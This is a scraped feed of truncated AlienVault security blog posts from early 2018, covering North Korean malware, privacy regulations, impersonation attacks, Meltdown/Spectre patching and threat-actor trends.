http://feeds.feedblitz.com/~/526798026/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Feb www.secnews.physaphae.fr/article.php?IdArticle=481022 False None NotPetya,Wannacry None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK. The Voice of Korea and the Rivts Virus This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet. A simple file-infector We triage many millions of malicious files automatically every day in an effort to ensure our customers are covered from new threats.  One malware family we regularly see, called Rivts by antivirus vendors, was originally created in 2009 but still continues to spread. Rivts is a file-infecting worm - it spreads across USB drives and hard drives attaching itself to files to spread further. The new files we see everyday are the result of new files being infected with the original worm from 2009 - not new developments by the attacker. Overall, it’s a fairly boring file infector (or “virus”). But there was one very strange thing that caught our eye. North Korean Software As part of its initial infection process, Rivts checks for the presence of system files normally found on Windows XP to infect first. But it seems to expect two pieces of uncommon software in the Windows System folder: Below are the details of these two files, nnr60.exe and hana80.exe: Whilst the DPRK is well known for developing its own Linux based operating system, and there is evidence of some DPRK hackers using ]]> 2018-02-15T14:00:00+00:00 http://feeds.feedblitz.com/~/526529066/0/alienvault-blogs~North-Korean-CyberAttacks-and-Collateral-Damage www.secnews.physaphae.fr/article.php?IdArticle=481023 False None APT 38,NotPetya,Wannacry,Yahoo None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Strategy When deciding how best to avoid OSINT that can be used to harass you in the future, it can help to break up the recorded details of your life into two broad categories; things you can hide/change, and things you can’t/or are difficult to hide or change. For the sake of this post, we will only be dealing with things that we have easy, online or physical control over. As always, it’s best to consult your threat models and apply reasonable measures to avoid whatever threats your particular ex may pose to you. Scrubbing public profiles is the first, easiest way to ensure that you aren’t sabotaging your own effort to avoid contact. Some simple steps you can take to increase your OPSEC include: Change all of your account passwords ASAP — If your instincts label someone as dangerous enough to alter publicly available information about yourself, it’s likely that their behavior follows a pattern that existed while you were together with them. Assuming close and personal contact with someone often means that you make exceptions to your threat models that allow them into close personal contact with both you and your devices. Never underestimate the lengths an untrustworthy ex-boyfriend or girlfriend will go to in order to snoop on you, so it’s best at minimum to ensure your passwords are in a controlled state. While you’re doing this, be sure to sign out of all other points of access for any given service. Revoke private keys and generate new key pairs — Physical access to electronic assets lends itself to theft of sensitive information that you may be holding to protect your communications, such as PGP keys. If you suspect that your keys may have been compromised, it never hurts to revoke and regenerate keys just to be safe. On the subject of keys, re-keying your door locks and changing garage door codes can be a good way of re-establishing your physical security, and reclaiming confidence that your environment is untouched while you’re gone. Secure crypto-coin wallets — Along with PGP keys, coin wallets are another source of electronic information, meant to be kept private that can easily be compromised by someone who knows what they want, knows where to find it, and has implicit access to the location they are kept. With ever increasing links between electronic and financial security, if one is compromised the other may be as well. Consider fresh installs of your operating systems and factory-resets of your phone — This may seem a little extreme, but especially good idea if your devices were ever left alone with your formerly-beloved for any amount of time long enough to exploit. A back doored phone or notebook would be a prime, continuing source of love-INT and in this post-FlexiSpy world, where commodity spyware is more accessible than ever to ]]> 2018-02-14T14:00:00+00:00 http://feeds.feedblitz.com/~/526211154/0/alienvault-blogs~Tips-To-Avoid-LOVEINT-On-Valentines-Day www.secnews.physaphae.fr/article.php?IdArticle=481024 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC People around the world are becoming increasingly connected with smart devices. Sending and receiving massive amounts of data back and forth, we rely on the transfer and storage of data on a daily basis. Hackers and cyber attackers know this and know how steal data for their profit. Your job as an information security specialist is to defend your company’s data, implementing preventative and protective measures and monitoring your data and systems. With the increasing amount of data businesses and its customers are producing comes an increasing number of people maliciously trying to obtain it. In 2017, we saw increases in ransomware attacks, financial fraud and massive data breaches. It was a busy year for security practitioners, and 2018 will be no different, with new global regulations, redesigned threats to new devices, and ways to combat those threats.    Let’s take look at some cybersecurity issues every InfoSec specialist should be aware of in the coming months of 2018. Upcoming Requirements of the GDPR The General Data Protection Regulation is the European Union’s way of protecting its citizens’ data by holding organizations and companies accountable in practices of security personnel in regards to sensitive information. As of May 25, 2018, companies will risk severe fines if they are not in compliance with the GDPR data protection rules. In an effort to minimize the damage done during recent data breaches, rules will be implemented on how you and your company obtain and secure data, as well as notifying users of the breach immediately. Under the GDPR, companies will rely on their IT security specialists to: Be given explicit consent when obtaining customer data. Be clear and upfront with customers in how they’ll obtain this data in language that is accessible and easy to understand. Comply with data protection officers who will inventory data in the EU, including outside company data that pertains to goods and services held within the EU. In the event of a breach, notify the public within 72 hours or be penalized. The EU isn’t the only geography implementing privacy measures for its citizens. Australia implemented privacy regulations recently as well.  The Liabilities of IoT In a day and age where humans are increasingly integrating the internet into their day-to-day lives, we have no choice but to submerge ourselves in the internet of things (IoT). This includes the business world as well. Mobile devices have become a necessity and a network of connected smartphones, tablets and other smart devices has made it considerably easier for businesses to access information from the internet and communicate. It also has made it considerably easier for hackers to get their hands on the same information — which is, in turn, making it harder and harder on the InfoSec practitioner. For usability purposes, nearly everything can be connected to Wi-Fi. A company’s smart coffee pot can be connected to an iPhone for a convenient cu]]> 2018-02-12T14:00:00+00:00 http://feeds.feedblitz.com/~/525524671/0/alienvault-blogs~Global-Cybersecurity-Concerns-in www.secnews.physaphae.fr/article.php?IdArticle=481025 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC By far one of the most engaging pieces I’ve read in a while is this Gizmodo article by Kashmir Hill and Surya Mattu on what happened when they decided to connect a whole bunch of “smart” devices in her apartment, and monitored what data was being collected and sent by these devices. The house that spied on me | Gizmodo Related Your TV is probably tracking you -- here's how to stop it | Cnet Boffins crack smartphone location tracking – even if you've turned off the GPS | The Register Amazon Says Don't Worry About This Raspberry Pi Key Hack -- But Is Fixing It Anyway | Forbes Ethereum Scammers make $5,000 in a night “Online scammers have made over $5,000 worth of Ethereum in one night alone, showing how gullible some cryptocurrency users can be. Miscreants achieved this by creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users to participate in "giveaways." Crooks deceived users into sending a small amount of Ethereum, promising they would receive the sum ten times over as part of the giveaway. All the messages followed the same pattern, even if the sums and Ethereum wallet addresses varied between the fake Twitter accounts.” Ethereum Scammers Make $5,000 in a Night by Impersonating Celebs on Twitter | Bleeping Computer Hunting Insecure Direct Object Reference Reading bug bounty reports where the researchers recount their steps are probably some of my favourite types of posts where I always end up learning something new. And this by Mohammed Abdul Raheem is no different. Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (part 1) | Codeburst.io Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART 2) | Codeburst.io Privacy down under While all eyes have been on GDPR, the Ozzies don’t want to be left behind as the Office of the Australian ]]> 2018-02-09T14:00:00+00:00 http://feeds.feedblitz.com/~/524596928/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Feb www.secnews.physaphae.fr/article.php?IdArticle=467404 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC U.S. Federal Bureau of Investigation (FBI) has warned businesses about this growing threat and has estimated that such attacks have caused losses of approximately $5.3 billion globally. A common example of impersonation attacks is Business Email Compromise (BEC) or "CEO fraud" that continues to manipulate companies by using false identities. This can severely damage a company’s reputation. This blog from last year explains BEC in detail. Why are Impersonation Attacks Hard to Detect? The major reason these attacks are difficult to be detected by users is ignorance and lack of attention to detail. Let’s understand this through an example: Below is the same email address written twice, how fast can you spot the one with some error? eeryaeel@reveantivirus.com eeryaeel@reventivirus.com It is hard to figure out the irregularity, especially when you have a hectic schedule at work and many distractions. How are Impersonation Attacks Constructed? Finding the Target With the help of social engineering techniques, attackers look for potential victims. Facebook, LinkedIn and Twitter profiles are easiest mediums for attackers to collect information about their target. Name, email address, school, job title, short bio, job duties, location, etc. can be easily fetched by attackers from target’s social media accounts. Social engineering, which requires very little technical skill, can typically get attackers an unbelievable amount of information about the victim, freely available online. Creating Credibility Now, as the attacker has a significant amount of the target’s information in hand, the next step is to build credibility. Again, social engineering is an effective way to set the stage for the attack. The attacker will try to figure out who to impersonate. It could be the victim’s boss, one of his colleagues or someone close to him. Close friends can be found on Facebook, and people tend to be very trusting if they think they are dealing with close friends. Through the company website and social media pages, the attacker can easily pick the person to impersonate. Executing the Attack The final and the most important step is to choose a type of attack. Below mentioned are top 3 tactics used by attackers: By Registering a Look-Alike Email Domain The attacker can register a similar email domain and create a new email ID using a similar name to the person being impersonated. The attacker sends an email message to the target asking them to respond urgently. For instance, impersonating the target’s boss, the attacker creates an email id Smith@reventivirus.com  and asks the victim to make urgent payment for an invoice attached with the message.   Editing the Display Name The majority of the mobile email clients only show the display n]]> 2018-02-08T14:00:00+00:00 http://feeds.feedblitz.com/~/524171922/0/alienvault-blogs~How-Dangerous-are-Impersonation-Attacks www.secnews.physaphae.fr/article.php?IdArticle=466646 False None Yahoo None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Google Project Zero post. If you are looking for something a little higher level, that includes more actionable pointers, I’d recommend this clear guide to Meltdown and Spectre patches. As for this post, I’m not going to provide another analysis of Meltdown and Spectre, and I’m also not going to pass judgement. I’m mainly concerned with what organizations are doing to defend themselves. Despite all the press and publicity (a Google query for “meltdown and spectre” yielded nearly three million entries after only 14 days) there has been little in the way of solid recommendations to blunt the impact of the problem. Microsoft has provided patches to block access to vulnerable operations, but these are offered with warnings about side effects and potentially disruptive software interactions. Similarly, Intel has released, then issued warnings on, firmware updates that were intended to help. There is an overarching sense of confusion about the right next steps, especially around the right timing to adopt these remediations. Seeing this, we kicked off a quick survey to find out how people were coping, and whether this critical and noisy problem was spurring rapid response, or whether those measures were being impacted by some of these negative reports. If you haven’t yet decided exactly what to do, you are not alone. Across the set of respondents, 95% of whom are directly responsible for security updates, only 21% had applied the Microsoft patch to more than 75% of their systems. Most of them, 51%, had patched less than a quarter of their systems, and 61% acknowledged that they were aware that these patches could cause adverse interactions with other products. This does not need to be the fire drill it may currently feel like The best advice for dealing with this situation is to recognize that the changes that major firms like Microsoft, Oracle, Apple, and others had to make are serious modifications to low-level system behaviors — changes that may impact their own performance, or that of other applications. These second-order consequences can be nearly as damaging as any eventual attack that exploits these flaws, particularly if widespread updates cause intermittent or widespread downtime. This event provides security leaders with the opportunity to show balance. A knee-jerk reaction is to instantly apply the patches when available, cleaning up the fall-out as it happens. But why? Currently]]> 2018-02-07T14:00:00+00:00 http://feeds.feedblitz.com/~/523777946/0/alienvault-blogs~How-to-Handle-Meltdown-and-Spectre-Patch-But-Don%e2%80%99t-Rush-It www.secnews.physaphae.fr/article.php?IdArticle=465965 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, they had a Google Webmaster Help forum thread where Googler, John Mueller, addressed this question head-on: “A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent? A year (the minimum duration, as far as I know) is pretty long in internet-time :-).” Next up, they had former Google PR chief, Matt Cutts, on the record several times addressing this issue: “To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. If a company is asserting that as a fact, that would be troubling.” So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top. (image source) The finding shows an odd correlation between SERP performance and its influence on ranks. The point of this being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr]]> 2018-02-06T14:00:00+00:00 http://feeds.feedblitz.com/~/523389918/0/alienvault-blogs~Debunking-these-Domain-Name-Registration-Myths-Once-and-For-All www.secnews.physaphae.fr/article.php?IdArticle=465029 False None APT 19 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC With GDPR the focus of many press headlines across the world, you’d think it was the first and only regulation covering the privacy of individuals! However, privacy regulations exist in numerous countries around the globe, and anyone in Australia or its territories will be all-too familiar with the Australian Privacy Act 1988 (which, for simplicity, I'll just refer to as 'the Privacy Act' from this point forward). Governed by the Office of the Australian Information Commissioner (OAIC), the Privacy Act introduces 13 Privacy Principles (known as Australian Privacy Principles, or APPs) that guide how the personal information of Australian subjects must be managed. Failure to protect personal information is deemed, “...an interference with the privacy of an individual,” with financial penalties that can go up to AUD$360,000 for individuals, and up to AUD$1.8M for organizations. What’s top of mind for many who are subject to the Privacy Act is a new amendment -- the Privacy Amendment (Notifiable Data Breaches) Act of 2017. Inspired by the proliferation of personal information stored in electronic form, such as social media content, healthcare records, and more, the amendment acknowledges the increasing risk (and occurrences) relating to breaches of that data. Starting 22 February 2018, the amendment introduces the Notifiable Data Breaches (NDB) scheme. This requires organizations to notify individuals of an ‘eligible data breach,’ which is defined as when BOTH the following conditions are met: An individual’s personal information has been subject to unauthorized access, disclosure, or loss; and The breach is likely to result in serious harm to that individual. Who Needs To Comply with the Australian Privacy Act? The Privacy Act applies to all Australian government agencies, businesses, and non-profit organizations with an annual turnover of more than AUD $3 million. In addition, small businesses and organizations with an annual turnover less than AUD$3 million who fall into the following categories must also comply with the Privacy Act: Private sector health service providers including: Traditional healthcare providers (hospitals, day surgeries, medical practitioners, pharmacists, health professionals). Complementary thera]]> 2018-02-05T14:00:00+00:00 http://feeds.feedblitz.com/~/523044702/0/alienvault-blogs~Australian-Privacy-Act-Gets-New-Notification-Requirements www.secnews.physaphae.fr/article.php?IdArticle=464442 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC browsers built-in login managers to retrieve and exfiltrate ID’s. The most commonly-asked question on the back of that was “which password managers should I use?”. Luckily, my friend Adrian Sanabria has done the legwork for you and compiled a list of password managers across different browsers and whether they leak credentials or not. Password Manager Vulnerability Silently Giving Up Credentials | Threatcare The follower factory A very well researched and presented piece by the NYTimes on the business of buying fake followers, what it means to those that buy it, the companies which broker fake identities, and the impact to social media platforms. The follower factory | NYTimes Somewhat related Here’s why the epidemic of malicious ads grew so much worse last year | ars technica Who will pay for Spectre? Probably you What do Toblerone and Brexit have in common with Spectre? A whole lot more than you may think. Who will pay for Spectre? Probably you | Owen Rogers, Medium GDPR Even my spellcheck knows not to question me whenever I type GDPR these days. But that’s not to say it isn’t a topic which generates good discussion. Two pieces that recently caught my eye were: Things to consider before publishing an article about GDPR | Rowenna Fielding / LinkedIn Data Protection, Security, and the GDPR: A fuzzy and fraught relationship | Infospectives The great crypto-currency rush Whether you believe that cryptocurrencies are a bubble, or the next big thing in online payments, there is no denying that it is a hot commodity at the moment. So much so, that criminals are putting a lot of effort into trying to illegally gain a slice of the crypto-pie. The attacks come from a variety of angles. A criminal was able to steal about $150,000 by tricking Experty users into sending their ]]> 2018-02-02T14:00:00+00:00 http://feeds.feedblitz.com/~/522220812/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-Feb www.secnews.physaphae.fr/article.php?IdArticle=464011 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Cryptocurrency and Blockchain Analysis Cryptocurrency is a digital currency, and it comes in many forms, built upon varying Blockchain technologies. Bitcoin is the original cryptocurrency, created in 2009 by cypherpunk Satoshi Nakamoto. Since then, many new alternative cryptocurrencies have been created, popular alternatives are Litecoin, Ethereum, and Monero. Samuel Falkon had it right when he said that “cryptocurrencies are a dream for privacy and freedom lovers because they restore transacting power back to whom it belongs — individuals who have a right to control their own money.” While cryptocurrency is a great advancement for a cypherpunk’s dream of privacy, it still comes with its own set of flaws that allow for deanonymization through Blockchain analysis and off-chain analysis. Bitcoin is often thought to be an anonymous solution for digital transactions, but this simply is not true. Every time a transaction is made, the technical details of said transaction becomes a public record on the Blockchain. The Blockchain is a public ledger that holds a history of all transactions ever made, thus leaving the potential for analysis of said transactions. Blockchain analysis services include: https://www.walletexplorer.com https://chainalysis.com https://scorechain.com https://blockseer.com https://coinalytics.co https://sabr.io https://elliptic.co http://numisight.com And many more More recently, The Bitfury Group released a whitepaper for their new Blockchain analysis algorithm with the goal of identifying the users behind digital transactions, dubbing their deanonymization solution as a “Bitcoin clustering” algorithm. Bitcoin address clustering is self-described as “a process that exposes bitcoin users by determining which addresses belong to a single user through an analysis of Blockchain data. The act of clustering groups those addresses together, enabling investigators to link them to a single entity.” (The Bitfury Group Unveils Solution For Analyzing Related Bitcoin Addresses, The Bitfury Group) The Bitfury Group’s analysis research should not be shocking to us. They perform Blockchain analysis, just as we should expect adversaries to do. The innovative part of this algorithm is that they are also analyzing publicly available information on the web, or as they call it “off-chain tag collection” to aid their clustering algorithm. There are two tag collection approaches that The Bitfury Group takes: passive and active. Off-chain tag collection for clustering, passive tag collection: The passive approach includes crawling the web for publicly available information, typically on]]> 2018-02-01T14:00:00+00:00 http://feeds.feedblitz.com/~/521946804/0/alienvault-blogs~Mitigating-Blockchain-Analysis-Mixing-Cryptocurrency www.secnews.physaphae.fr/article.php?IdArticle=463357 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Jason Graf, director of managed security services for Sword & Shield Enterprise Security, a top Managed Security Services Provider (MSSP) based in Knoxville, Tennessee. We talked about the evolving threat landscape and the challenges associated with detecting and analyzing ransomware and other emerging threats on a daily basis. Graf started the discussion by providing context around Sword & Shield’s business, which has been protecting critical data for mid-to-large-sized companies for more than 20 years. The company started focusing on managed security services five years ago as attacks became more sophisticated and burdensome for companies. The MSSP’s core business is to provide 24/7 detection and response capabilities against cyber threats for its customers. “Sword & Shield combines expert analysts, proprietary processes, and advanced technology to protect our clients around the clock, 365 days a year. We take this responsibility seriously, so we only use technology that is up to the task.” Graf went on to explain that Sword & Shield’s managed security services also helps companies to achieve industry compliance. “Compliance is a key driver of our services, particularly for companies in the healthcare and retail industries that need to satisfy regulatory and industry requirements.” Graf said the Sword & Shield team of security analysts monitor from 1,000 to 20,000 assets per customer environment - every day. That’s a lot of assets! Not only are there more assets than ever to monitor today, but security threats are also getting more complex and harder to detect. Sword & Shield relies on AlienVault® Unified Security Management® (USMTM) to detect and analyze their customers’ threats. USM includes built-in security controls and continuous threat intelligence updates from AlienVault Labs to simplify threat detection and incident response. A unified approach to security monitoring eliminates the need for Sword & Shield to manage multiple solutions, saving them time and money. Sword & Shield also leverages threat intelligence updates from AlienVault’s Open Threat Exchange® (OTXTM), which monitors emerging threats from all over the world. By leveraging USM and OTX, Sword & Shield can focus on delivering value to their customers through threat detection and SOC data analysis to more rapidly grow their managed security services. Graf likes the comprehensiveness of USM as compared to other security solutions. He explained that it goes well beyond just providing traditional capabilities of SIEM and log management. “While other providers offer point solutions, AlienVault’s USM provides a holistic, unified solution with essential capabilities including intrusion detection and vulnerability management.” For Sword & Shield, pinpointing where hacker command and control communications are before they are used for malicious activities is important. The MSSP can consolidate their alarms, vulnerabilities and configuration issues into a single view through USM Central, our threat management console available with the USM platform.  A consolidated view of the threats detected in their end customer environments enables Sword & Shield to work more efficiently and respond more quickly to any security incidents detected. ]]> 2018-01-31T14:00:00+00:00 http://feeds.feedblitz.com/~/521596094/0/alienvault-blogs~Threat-Detection-in-a-Changing-Market-A-Conversation-with-AlienVault-MSSP-Partner-Sword-amp-Shield www.secnews.physaphae.fr/article.php?IdArticle=462740 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Part 1 focused on exploits and part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX. Which threat actors should I be most concerned about? Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor. Therefore below we’ve limited ourselves to some very high level trends of particular threat actors below- many of which may not be relevant to your organisation. Which threat actors are most active? The following graph describes the number of vendor reports for each threat actor over the past two years by quarter: For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy. Caveats There are a number of caveats to consider here. One news-worthy event against a single target may be reported in multiple vendor reports. Whereas a campaign against thousands of targets may be only represented by one report. Vendors are also more inclined to report on something that is “commercially interesting”. For example activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX which may explain some of the increase in reports between 2016 and 2017. The global targeted threat landscape There are a number of suggested methods to classify the capability of different threat actors. Each have their problems however. For example – if a threat actor never deploys 0-day exploits do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted out a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples to apples comparison. Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are not scientific, but can provide some rough insights: A rough chart of the activity and capability of notable threat actors in the last year Perhaps most notable here is which threat actors are not listed here. Some, such as APT1 and Equation Group, seem to have disappeared under their existing formation following from very public reporting. It seems unlikely groups which likely employ thousands of people such as those have disappeared completely. The lack of such reporting is more likely a result of significantly changed tactics and identification following their outing. Others remain visibly active, but not enough to make our chart of “worst offenders”. A review of the most reported on threat actors The threat actor referenced i]]> 2018-01-30T13:40:00+00:00 http://feeds.feedblitz.com/~/521337082/0/alienvault-blogs~OTX-Trends-Part-Threat-Actors www.secnews.physaphae.fr/article.php?IdArticle=461917 False None APT 38,APT 10,APT 28,APT 3,APT 1,APT 34 None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC It’s hard to envision hackers, whether skiddies, APTs, or anything in between, using any sort of artificial intelligence (AI) or machine learning (ML) to attack a target network. Despite the availability of these sophisticated technologies, the most simplistic attack tactics continue to work. Enterprises aren’t patching known vulnerabilities; freely available malware can run in memory un-detected; users continue to click on links they receive in email or allow macros on that innocent-looking office document; and internal network logs are often not collected and even more rarely kept for any period. if these methods work, why would adversaries turn to more complex solutions like AI or ML? Looking back on 2017, perhaps the biggest takeaway is that the most obvious methods still work. Adversaries seek the greatest mission gain with the lowest amount of resources expended and equities exposed. For example, Equifax wasn’t pwned by a fancy ZeroDay exploit or an insider with a USB drive; PII on millions of consumers wasn’t culled from S3 buckets because Amazon’s infrastructure was hacked by an APT; WannaCry wasn’t the result of a ZeroDay vulnerability; and people (amazingly) clicked Yes to download an update to Adobe Flash, giving us BadRabbit! Sticking with what works continues to pay off for all adversaries, irrespective of their resources, motives or intent. So, what’s with the fear mongering over hackers using AI and ML to attack their targets? AI (by which I mean both Machine Learning and AI in general) is the gift that keeps on giving. Most in the InfoSec community agree that AI has its place in the defense of the enterprise. The problem is that few people understand how AI works or how to best apply it, and many cybersecurity companies take advantage of this situation by making fancy sounding claims about the number of models they apply to the data or the types of mathematics they use to generate results. These claims generally go hand-in-hand with a dark-themed user interface with some sort of spinning globe or pew-pew map. And while defenders work to sift through the marketing blather and outrageous claims about cybersecurity products that use AI, some in the security world take further advantage, and extend the FUD further: what could be better to sow fear and confusion than claiming that hackers are now using AI to attack your network? The more observant in the InfoSec community have noticed that this language tends to originate with companies that stand to profit on the very same FUD that permeates the market. This FUD spreading takes on a few different forms, often by way of polls, as in, how many people believe hackers will use AI. There’s been a few of these polls where more than 50 percent of the respondents agree that this is a real threat. For the life of me, I can’t understand why. The other way is through companies that make the claim. This comes in the form of sponsored posts on various InfoSec news sites, or interviews with company executives. There have been claims made about adversaries detected and intrusions executed using AI; while this may come to pass in the future, it’s incredibly unlikely any time soon. There are simply too many ways for adversaries to attack networks and accomplish their objectives using far more simplistic and less risky tactics. An adversary who has mastered the use of AI in their operations would only use it for the hardest of the hard targets, and even then, they’re likely to find an easier way to achieve their objective. Yet, it’s important to note that the academic and security-minded research into hackers use of AI is real, and important. Adversarial machine learning is one angle. This work is important; it helps understand the cap]]> 2018-01-29T14:00:00+00:00 http://feeds.feedblitz.com/~/521089464/0/alienvault-blogs~Hackers-Using-AI-An-Increase-in-the-FUD-Factor www.secnews.physaphae.fr/article.php?IdArticle=461314 False None Wannacry,Equifax None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC The first New York State (NYS) Department of Financial Services (DFS) CISO Attestation is due on February 15th. Last year, the NYS DFS enacted a new cybersecurity regulation that affects all financial companies that conduct business in the State of New York. The regulation is targeted towards financial companies that conduct business in New York State.  A "Covered Entity" means any Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law of the State. A company need not be domiciled in the State to be subject to the regulation.  (Very similar to how GDPR is set up.) Financial institutions include banks, money managers, and insurance companies. There are exceptions, but they are quite limited (based on institutional income and employee count). The impact of this regulation is very broad. In previous articles, I discussed the evolution of the regulation, as well as some of the important milestones that must be achieved in order to achieve compliance with the regulation. The first milestone date passed back in August, and now, the next important milestone is looming whereby the designated CISO of each financial organization must file the first certification of the organization’s compliance with the regulation. The regulation includes the letter that must be filled out and filed with the Department of Financial Services.  It is a simple, somewhat inelegant form, but it packs a powerful legal punch in that the CISO is attesting that the regulation is being followed.  This means that your organization must have implemented the six items required in the first milestone. The reason why this simple form is so powerful is due to the undefined enforcement powers of the regulation.  The exact language states: “This regulation will be enforced by the superintendent pursuant to, and is not intended to limit, the superintendent’s authority under any applicable laws”.  To a tech person, those sound like some very broad enforcement powers. One has to wonder if enforcement will be limited to prevention of a non-compliant business from conducting operations in New York, or perhaps they can be as harsh as those prescribed in the GDPR, which becomes effective in May.  Cybersecurity has now gone very mainstream and become very serious.  Now is a good time to review if your organization has stayed on track with the regulation’s milestones.  Please also note that the next milestone is March 1st. Many of us in the InfoSec community anticipated that this new era of cybersecurity regulation was on the way.  However, now is not the time for any “I told you so” smugness.  Remember, it is our job to guide organizations about how to meet the requirements of these new regulations.  Remember, if you are not the CISO, then you are probably responsible for making the CISO’s job easier.  Let your expertise lead]]> 2018-01-26T14:00:00+00:00 http://feeds.feedblitz.com/~/520404214/0/alienvault-blogs~NY-State-Department-of-Financial-Services-New-Cybersecurity-Regulation-%e2%80%93-CISO-Attestation-Due-Feb www.secnews.physaphae.fr/article.php?IdArticle=460880 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC In my last blog, I wrote about how words are created and then become mainstream over time, and how that time is longer for normal words, and shorter for words used to describe things in tech. But it’s not always a straightforward nor does it always land in the correct place. To illustrate, I give you, “on premise” versus “on premises”; a battle that has happened to every company that’s ventured into the Cloud (which is a whole other language discussion we’ll have some other time). In 2013, Brian Madden fired the first shot of the linguistic resistance to the term “on premise”: And then, after much discussion, in 2014, he conceded defeat. “I'm saddened that the industry seems to have adopted the grammatically-incorrect term "on premise" in place of the actual term, "on premises" when discussing where servers will live.” he wrote. He goes on to bemoan the fact that “VMware, Citrix, and Microsoft all preferring the term "on premise" over "on premises" in their official press releases and technical documents.” He continues on to say that “Or maybe this is the evolution of language. It's shortened, perverted, and flexed to evolve with the times. Fine, let's call it linguistic evolution.” Brian, dude. We can do better. This isn’t evolution; this is people being incapable of finding an online dictionary. The Merriam-Webster Online Dictionary, our dictionary of choice here at AlienVault, is pretty clear on the difference between the two terms. Premise: a : a proposition antecedently supposed or proved as a basis of argument or inference; specifically : either of the first two propositions of a syllogism from which the conclusion is drawn b : something assumed or taken for granted : presupposition whereas Premises: a : a tract of land with the buildings thereon b : a building or part of a building usually with its appurtenances (such as grounds) further, On premises:  inside a building or on the area of land that it is on  Full meals are available at restaurant on premises. No smoking on premises. Tom at The Networking Nerd, a word geek after my own heart, brings us the etymology: The etymology of these two words is actually linked, as you might expect. Premise is the first to appear in the late 14th century. It traces from the Old French premise which is derived from the Medieval Latin premissa, which are both defined as “a previous proposition from which another fo]]> 2018-01-25T14:00:00+00:00 http://feeds.feedblitz.com/~/520116080/0/alienvault-blogs~When-Bad-Language-Happens-To-Good-Systems www.secnews.physaphae.fr/article.php?IdArticle=460289 False None None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Difficult problems are best solved when they are worked backwards. Researchers are great at inverting systems and technologies to illustrate what the system architect would have rather avoided. In other words, it’s not just enough to think about all the things that can be done to secure a system, but to think about all the things that would leave a system insecure. From a defensive point of view, it means not just thinking about how to achieve success, but also how failure would be managed. 2. Confirmation Bias What someone wishes, they also believe. We see confirmation bias deeply-rooted in applications, systems, and even entire businesses. It means that two people with opposing views on a topic can see the same evidence and come away feeling validated by it. It’s why two auditors can assess the same system and arrive at vastly different conclusions as to its adequacy. However, confirmation bias is extremely dangerous from a defenders’ perspective, and clouds judgement. This is something hackers take advantage of all the time. People often fall for phishing emails because they believe they are too clever to fall for one, or too insignificant to be targeted. It’s only until it’s too late that reality sets in. 3. Circle of Competence Most people have a thing they’re really, truly good at. But if you test them in something outside of this area, you’ll find they’re not particularly well-rounded. Worse, they may be ignorant of their own ignorance -- you probably know this as the Dunning-Kruge]]> 2018-01-24T14:00:00+00:00 http://feeds.feedblitz.com/~/519806748/0/alienvault-blogs~Mental-Models-amp-Security-Thinking-Like-a-Hacker www.secnews.physaphae.fr/article.php?IdArticle=459639 False Guideline None None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Part 1 focused on the exploits tracked by OTX. This blog will talk about the malware, and Part 3 will discuss trends we’re seeing in threat actors. Which malware should I be most concerned about? Most security incidents that a security team will respond to involve malware. We took a look at three sources of malware telemetry 